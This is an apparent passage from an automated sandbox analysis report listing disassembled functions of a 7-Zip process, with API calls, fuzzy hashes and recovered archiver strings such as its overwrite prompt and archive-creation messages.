                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$FileMove
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 288606353-0
                                                                                                                                                                                                                                                  • Opcode ID: c934d79802b123a65afdecf3c3c141401825e728ddd7393a0425fdd743619d48
                                                                                                                                                                                                                                                  • Instruction ID: 67325443da2508fe9bd8b624dee0e672edc58d07158a32ac576afab3ce770773
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c934d79802b123a65afdecf3c3c141401825e728ddd7393a0425fdd743619d48
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2911DA2335894145CA20EF25E8517BF5724EBC2BE0F48D221FEAE57366DE29CC86C700
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0097794C: FindClose.KERNELBASE ref: 0097795E
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32 ref: 00977BAA
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32 ref: 00977BB9
                                                                                                                                                                                                                                                  • FindFirstStreamW.KERNELBASE ref: 00977BDB
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00977BEA
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$Find$CloseFirstStream
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4071060300-0
                                                                                                                                                                                                                                                  • Opcode ID: a6e64fabe6673e363aad17d05dfc3ab5172c88e9485b2e4bf2568c0b8856aec2
                                                                                                                                                                                                                                                  • Instruction ID: 26f01d025b3ca4f4b1c826eb365c2692ceabc968ba8a9ea3e233e134625383ed
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a6e64fabe6673e363aad17d05dfc3ab5172c88e9485b2e4bf2568c0b8856aec2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4621B023208B4082DA219B65E8543A9A364FBDAB74F58D321DEBE477E5DF3CC949C200
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? , xrefs: 009BCD2A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputsfree
                                                                                                                                                                                                                                                  • String ID: (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit?
                                                                                                                                                                                                                                                  • API String ID: 2581285248-171671738
                                                                                                                                                                                                                                                  • Opcode ID: 4b5025059e70d1de0ed5aeed492243599037d1a5b9a8e456c84aaac635c9e110
                                                                                                                                                                                                                                                  • Instruction ID: 2081518079a5a0f1d74f417af18a99a39a3627a782181fa96ae9727c10a77c9a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b5025059e70d1de0ed5aeed492243599037d1a5b9a8e456c84aaac635c9e110
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C931D8A6208545C7EB309B18DAA53E92765E3C47B5F884132EB5E073E6CB1CCCA5D701
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$memmove
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1534225298-0
                                                                                                                                                                                                                                                  • Opcode ID: 150ae877ff484c22bc24b8578f302cb24d5b1ad4491463f4b87d27cac02bb206
                                                                                                                                                                                                                                                  • Instruction ID: c7cb29a3e385086481af6c65faa41c7cf79de19334ed50da94d5f6f45288f617
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 150ae877ff484c22bc24b8578f302cb24d5b1ad4491463f4b87d27cac02bb206
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9921786331994055CE20EF25E85135EA720EBC27D4F94D221FB6E577BADF28C646C710
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputs$fputc
                                                                                                                                                                                                                                                  • String ID: Time =
                                                                                                                                                                                                                                                  • API String ID: 1185151155-458291097
                                                                                                                                                                                                                                                  • Opcode ID: 16a4f377ae2496a292c66f8ada87fd246b35ce43fff94a3fe0e30452b0aef1ee
                                                                                                                                                                                                                                                  • Instruction ID: 1c6a976991d705af7c78eeedab79e03c76d83c0f58479ae55a7102a5bc35b89d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 16a4f377ae2496a292c66f8ada87fd246b35ce43fff94a3fe0e30452b0aef1ee
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6421A595350A1185FA08AF2AFE543995356A788FD4F08E036DE1E0776ADE3CD856C300
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CriticalSectionfreememmove$EnterExceptionLeaveThrow
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 202075352-0
                                                                                                                                                                                                                                                  • Opcode ID: c1de02b68f69ecc8d262e9e614d11b3dc807500ecf55debccae22723f41cb44a
                                                                                                                                                                                                                                                  • Instruction ID: 1970941f5bb9673ec7e91ab1bc852c738fddda8ce43b9a1209512c828f50a8fc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c1de02b68f69ecc8d262e9e614d11b3dc807500ecf55debccae22723f41cb44a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C21A47722065486C760EF26D4517AC7321F381BF5F905326EE29076A5DF35C845CB40
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: e14598800cbc14b63090d73ae88cee87996ce6beccad5b2fb40a6b4c20696fd9
                                                                                                                                                                                                                                                  • Instruction ID: 54cc95c0b13f41e8cdc1cc14cd373ef23c6da8cfccd0e88ebaba7938d01eb205
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e14598800cbc14b63090d73ae88cee87996ce6beccad5b2fb40a6b4c20696fd9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66111E23316A8485CB11EF3AD8917692320FBC6FA8F5882719F6D577A9CE24C847C324
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: 5256221f962b44b0bae35b382dbe45db83359140e8ddd7a193f45a58e1d598c8
                                                                                                                                                                                                                                                  • Instruction ID: 8fa331854d0ab2e3dd13e9b1bd30f91989ef20c349f78f67f7eaf4092be76e78
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5256221f962b44b0bae35b382dbe45db83359140e8ddd7a193f45a58e1d598c8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F601A523715990898F22EF2FDC512696325FBD5FE47594225EF2D1B359DE20CC42C360
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: a7c0efb318bb74a8d890d53e5fdb20e58762af4d74ce4d6a5953f08b0b6776bf
                                                                                                                                                                                                                                                  • Instruction ID: abbcc2a87e9cce59e8f4ec081767ef2dd42eb90aba30e553f3c14ffb7b9afa27
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a7c0efb318bb74a8d890d53e5fdb20e58762af4d74ce4d6a5953f08b0b6776bf
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3111212375694085CB20AF36D85176D2314FBC7FA4F588271AF6D5B7A9CE24C846C360
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009B6B7C
                                                                                                                                                                                                                                                    • Part of subcall function 00976618: FormatMessageW.KERNEL32 ref: 00976676
                                                                                                                                                                                                                                                    • Part of subcall function 00976618: LocalFree.KERNEL32 ref: 00976698
                                                                                                                                                                                                                                                    • Part of subcall function 00972320: free.MSVCRT ref: 0097237E
                                                                                                                                                                                                                                                    • Part of subcall function 00972320: fputs.MSVCRT ref: 009723B8
                                                                                                                                                                                                                                                    • Part of subcall function 00972320: free.MSVCRT ref: 009723C4
                                                                                                                                                                                                                                                    • Part of subcall function 00972300: fputc.MSVCRT ref: 00972311
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009B6BAE
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009B6BCC
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputsfree$FormatFreeLocalMessagefputc
                                                                                                                                                                                                                                                  • String ID: : $----------------
                                                                                                                                                                                                                                                  • API String ID: 1215563195-4071417161
                                                                                                                                                                                                                                                  • Opcode ID: a1891ed469a183347d2f6cf8ed5e79c02ed55b8146c20c8c025d0fedb9797568
                                                                                                                                                                                                                                                  • Instruction ID: 5d60b9e1b365d667225107eca4ea87af88979a2550be89a3ef535358cd758f1f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a1891ed469a183347d2f6cf8ed5e79c02ed55b8146c20c8c025d0fedb9797568
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 72015B63704A0585DA20EF26E99476E3321F788BE4F588226EE6E077A5CF28D946C700
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: 68bdc44b06e71d8ca899e980b2fc608d9b8ec41ef539896fcf9a05c16de42b60
                                                                                                                                                                                                                                                  • Instruction ID: 9825981d145664f08d3910c5a5062351e744896c86f35447ded80d3b888ff5e7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 68bdc44b06e71d8ca899e980b2fc608d9b8ec41ef539896fcf9a05c16de42b60
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9AF03C23B2585089CB11AF37DE912AC2324BBC6FE47998161AF1D5B35ADE20C853C3A0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009BBCD4
                                                                                                                                                                                                                                                    • Part of subcall function 00972320: free.MSVCRT ref: 0097237E
                                                                                                                                                                                                                                                    • Part of subcall function 00972320: fputs.MSVCRT ref: 009723B8
                                                                                                                                                                                                                                                    • Part of subcall function 00972320: free.MSVCRT ref: 009723C4
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009BBD17
                                                                                                                                                                                                                                                    • Part of subcall function 00972300: fputc.MSVCRT ref: 00972311
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009BBD2B
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputsfree$fputc
                                                                                                                                                                                                                                                  • String ID: : $Write SFX:
                                                                                                                                                                                                                                                  • API String ID: 3584323934-2530961540
                                                                                                                                                                                                                                                  • Opcode ID: 2aff07aef23fae9920ced389d97e2e1f62bb88a79c222afd3b495df10a0729ce
                                                                                                                                                                                                                                                  • Instruction ID: 01b8c2a4398c2c187f5392b9a18f5ba404999fab39476db23f107d4de8e55686
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2aff07aef23fae9920ced389d97e2e1f62bb88a79c222afd3b495df10a0729ce
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F01F4A231494080DA20DB26ED5479E6321E7D4FF4F48D631AE6E477A9DF28C586C710
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009BBB49
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009BBB76
                                                                                                                                                                                                                                                    • Part of subcall function 00972568: free.MSVCRT ref: 009725B5
                                                                                                                                                                                                                                                    • Part of subcall function 00972568: free.MSVCRT ref: 009725C0
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputsfree
                                                                                                                                                                                                                                                  • String ID: Creating archive: $StdOut$Updating archive:
                                                                                                                                                                                                                                                  • API String ID: 2581285248-1319951512
                                                                                                                                                                                                                                                  • Opcode ID: 5f5adb3b3a84b5c65e0bca1f05b3611791ef6013b907f1f29a1bbb4614530b65
                                                                                                                                                                                                                                                  • Instruction ID: 7ac0d6fb849dff7a274523bbe522b30b02f44d8ce446a61aed3e9c34baf27c03
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5f5adb3b3a84b5c65e0bca1f05b3611791ef6013b907f1f29a1bbb4614530b65
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11F062A6701A45C1DE04DF2AEA987AC6322AB88FE4F48D4328D0F0B359DF2CC4898310
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: a6ffee1f7beb7570a11c572b2a51825e1f9c21a757c731fd3d53281771c8903a
                                                                                                                                                                                                                                                  • Instruction ID: d2bc19cabd76860e8614cb3a33bc212d05607146d15e76aa096ddf86d9c9d3e2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a6ffee1f7beb7570a11c572b2a51825e1f9c21a757c731fd3d53281771c8903a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3E0E92363840481DB14FF77DCA222C3324FBD5F8875494A29F2E8B325CD24C852C3A4
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: 167d3dd7d05659914fe51c99b092b0523b74a4040e8688ef161580a56a1d8b48
                                                                                                                                                                                                                                                  • Instruction ID: c1e2e8a1f4a8b9de2973abfee083887063c8672e763dfbdb9fd6a0de57ed4546
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 167d3dd7d05659914fe51c99b092b0523b74a4040e8688ef161580a56a1d8b48
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8813463305AC485CB14EF2AD8842AD77A5F785F98F498122DF5D0BB69CF35C886C351
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: Q
                                                                                                                                                                                                                                                  • API String ID: 0-3463352047
                                                                                                                                                                                                                                                  • Opcode ID: f10b8452263e2253671aa6e26e66aae54564acf07f5c2ea8efc5759ba0d9d814
                                                                                                                                                                                                                                                  • Instruction ID: e67d8e412fbf0d94a2c93f66c6c73eba5264fb1416e8b9da0f31bbc75c29a569
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f10b8452263e2253671aa6e26e66aae54564acf07f5c2ea8efc5759ba0d9d814
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8616F63319A8082CF20DF2AE48066EB765F7C8B94F549611FB9E57768DF79C885CB00
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
